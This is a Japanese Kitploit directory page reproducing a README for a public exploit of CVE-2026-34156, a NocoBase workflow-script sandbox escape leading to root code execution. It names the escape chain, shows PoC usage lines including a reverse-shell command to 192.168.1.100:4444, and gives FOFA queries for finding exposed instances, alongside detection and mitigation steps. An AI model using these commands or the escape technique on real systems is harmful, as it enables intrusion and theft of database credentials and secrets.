Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-34156 — CVE-2026-34156 | Kitploit
ツール/GitHubGitHub/0xblackash/cve-2026-34156
脆弱性分析コード分析エクスプロイトウェブアプリケーション悪用CTFペネトレーションテスト学習と教育
GitHub0xblackash/cve-2026-34156

CVE-2026-34156

CVE-2026-34156

リポジトリを見る
4ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

🚨 CVE-2026-34156 - NocoBase 重大なサンドボックスエスケープ

ChatGPT Image Apr 3, 2026, 01_32_16 PM Critical CVSS 9.9 Exploit Public

NocoBase における未認証 / 低権限 → Root リモートコード実行


📌 概要

CVE-2026-34156 は、NocoBase(オープンソースのノーコード / ローコードプラットフォーム)における重大なサンドボックスエスケープの脆弱性です。

ワークフロースクリプトノードを作成または実行できる攻撃者(低権限でも可)は、Node.js の vm サンドボックスをエスケープし、コンテナ内でroot としての完全なリモートコード実行を達成できます。

影響を受けるバージョン

  • NocoBase < 2.0.28

修正バージョン

  • NocoBase 2.0.28(2026年3月リリース)

🛠 脆弱性の詳細

  • コンポーネント: @nocobase/plugin-workflow-javascript(スクリプトノード)
  • 種別: console._stdout.constructor.constructor によるサンドボックスエスケープ
  • 影響:
    • root としてのリモートコード実行(uid=0)
    • 任意のコマンド実行
    • ファイルシステムへのアクセス(fs)
    • 環境変数の漏えい(データベース認証情報、シークレット)
    • コンテナの完全な侵害

根本原因

サンドボックスに渡される console オブジェクトはホストレルムのものであり、攻撃者はプロトタイプチェーンをたどって実際の Function コンストラクタ → process.mainModule.require にアクセスできます。


🚀 エクスプロイト

概念実証(PoC)

root@kitploit:~
# Simple command execution
python3 CVE-2026-34156.py -u https://target.com -e [email protected] -p password -c "id"

# Reverse shell
python3 CVE-2026-34156.py -u https://target.com -r 192.168.1.100:4444

リポジトリに含まれるもの: 完全な PoC スクリプト、Nuclei テンプレート、安全性チェッカー。


🧪 検出

Nuclei テンプレート

root@kitploit:~
nuclei -u https://target -t cves/CVE-2026-34156.yaml

FOFA 検索クエリ

root@kitploit:~
title="NocoBase" || title="Sign in - NocoBase"
title="NocoBase" && body="workflow"

🛡️ 対策

  1. 直ちにNocoBase 2.0.28以降へアップグレードする。
  2. 信頼できないユーザーに対してワークフロースクリプトノードを無効化する。
  3. NocoBase コンテナを非 root ユーザーで実行する。
  4. 本番環境ではより強力なサンドボックス(例: isolated-vm)を使用する。

📸 スクリーンショット

cve-2026-34156

⚠️ 法的免責事項

このリポジトリは教育目的および許可を得たセキュリティ研究のみを対象としています。
使用するのは、自分が所有しているか、明示的な書面による許可を得たシステムのみにしてください。

無断での悪用は違法です。


⭐ クレジット & 参照

  • 発見者: 不明(公開情報)
  • 修正: NocoBase セキュリティチーム
  • NVD: CVE-2026-34156
  • GitHub セキュリティアドバイザリ: GHSA-px3p-vgh9-m57c

セキュリティコミュニティのために ❤️ を込めて
安全を確保し、迅速にパッチを適用しましょう。

ツールをダウンロード